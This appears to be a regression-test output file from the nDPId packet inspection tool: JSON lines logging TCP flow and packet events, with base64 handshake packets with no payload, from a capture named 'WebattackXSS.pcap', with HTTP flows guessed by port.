+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1499347252180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347252180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06Q9AAD4G3MisEAABwKgKMtesAFDOJxTPqWjIzoAQAOX\/rQAAAQEICgE5\/cAD4882"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347253445,"flow_last_seen":1499347253445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347253445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1499347253445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uoZAAD4GC0qsEAABwKgKMte6AFBXtER6AAAAAKACchDqlAAAAgQFtAQCCAoBOf78AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1499347253445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347253445,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ17p5Tes0V7REe6AScSCymwAAAgQFtAQCCAoD49ByATn+\/AEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1499347253445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uodAAD4GC1GsEAABwKgKMte6AFBXtER7eU3rNYAQAOVRowAAAQEICgE5\/vwD49By"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347254714,"flow_last_seen":1499347254714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347254714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1499347254714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347254714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sPBAAD4GFOCsEAABwKgKMtfIAFAvObDJAAAAAKACchCldQAAAgQFtAQCCAoBOgA5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1499347254714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347254714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ18hpS4YpLzmwyqAScSDhSwAAAgQFtAQCCAoD49GwAToAOQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1499347254715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347254715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sPFAAD4GFOesEAABwKgKMtfIAFAvObDKaUuGKoAQAOWAUgAAAQEICgE6ADoD49Gw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347257224,"flow_last_seen":1499347257224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347257224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1499347257224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347257224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MIRAAD4GlUysEAABwKgKMtfiAFCgDzIpAAAAAKACchCwsQAAAgQFtAQCCAoBOgKtAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":2,"flow_last_seen":1499347257224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347257224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1+LmPUR7oA8yKqAScSCu0AAAAgQFtAQCCAoD49QjAToCrQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":3,"flow_last_seen":1499347257225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347257225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MIVAAD4GlVOsEAABwKgKMtfiAFCgDzIq5j1EfIAQAOVN2AAAAQEICgE6Aq0D49Qj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2421,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347258474,"flow_last_seen":1499347258474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347258474,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2421,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1499347258474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347258474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87xpAAD4G1rWsEAABwKgKMtfwAFBQ0ez\/AAAAAKACchBD0wAAAgQFtAQCCAoBOgPlAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1499347258474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347258474,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1\/Cr4O+wUNHtAKAScSDP4AAAAgQFtAQCCAoD49VcAToD5QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1499347258474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347258474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07xtAAD4G1rysEAABwKgKMtfwAFBQ0e0Aq+DvsYAQAOVu5wAAAQEICgE6A+YD49Vc"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347259759,"flow_last_seen":1499347259759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347259759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1499347259759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347259759,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xl9AAD4GZ3GsEAABwKgKMtf+AFDARlt4AAAAAKACchBklQAAAgQFtAQCCAoBOgUnAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":2,"flow_last_seen":1499347259759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347259759,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1\/6Hgb3OwEZbeaAScSBFowAAAgQFtAQCCAoD49adAToFJwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":3,"flow_last_seen":1499347259760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347259760,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XmBAAD4GZ3isEAABwKgKMtf+AFDARlt5h4G9z4AQAOXkqgAAAQEICgE6BScD49ad"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347262289,"flow_last_seen":1499347262289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1499347262289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347262289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ic9AAD4GPAGsEAABwKgKMtgYAFBS2I5QAAAAAKACchCcmQAAAgQFtAQCCAoBOgefAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":2,"flow_last_seen":1499347262289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347262289,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2BhB\/tqnUtiOUaAScSCj2QAAAgQFtAQCCAoD49kVAToHnwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":3,"flow_last_seen":1499347262290,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347262290,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0idBAAD4GPAisEAABwKgKMtgYAFBS2I5RQf7aqIAQAOVC4QAAAQEICgE6B58D49kV"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 